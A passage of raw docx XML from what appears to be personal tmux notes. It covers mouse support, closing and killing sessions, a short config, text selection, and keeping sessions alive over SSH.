        <w:t xml:space="preserve">: Ensure the terminal window is large enough to accommodate your layout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mouse not working</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.tmux.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Exiting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> All windows and panes in a session must be closed. Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in each.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C63">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux kill-session -t my_session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_so8c29inshp2" w:id="551"/>
      <w:bookmarkEnd w:id="551"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tmux config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C67">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set-window-option -g mode-keys vi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C68">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C6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6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C6D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_emzsl0hboc9s" w:id="552"/>
      <w:bookmarkEnd w:id="552"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Enable Mouse Support (scrolling through terminal using mouse):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano ~/.tmux.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit your tmux configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add this line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux source-file ~/.tmux.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reload the config file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C7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78">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68w3foz95hie" w:id="553"/>
      <w:bookmarkEnd w:id="553"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to select text after you Enable Mouse Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After you enable mouse support, you can't select text like normal. Use this solution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="777"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Mouse Copy Interception Temporaril</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">y: Hold Shift while selecting text with the mouse. This bypasses tmux's mouse interception and allows your terminal emulator to handle the selection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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3C7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C80">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_882vzccfaj7t" w:id="554"/>
      <w:bookmarkEnd w:id="554"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using tmux with SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SSH with tmux allows you to run commands or manage remote systems persistently. If your SSH connection is interrupted, your tmux session remains active on the remote server, letting you reconnect and resume without losing progress. Here's how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh user@remote-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux new -s mysession</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this inside the SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After SSH connections dies, the tmux session stays alive! Now, all you have to do is ssh back into the server and then attach again: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux attach -t mysession</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This makes sure everything is saved incase u accidentally break SSH. Everything is saved. It's like you never left!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this requires you to have tmux installed inside the SSH server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C8B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C8C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9laqjipbum4k" w:id="555"/>
      <w:bookmarkEnd w:id="555"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installing tmux </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if tmux is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
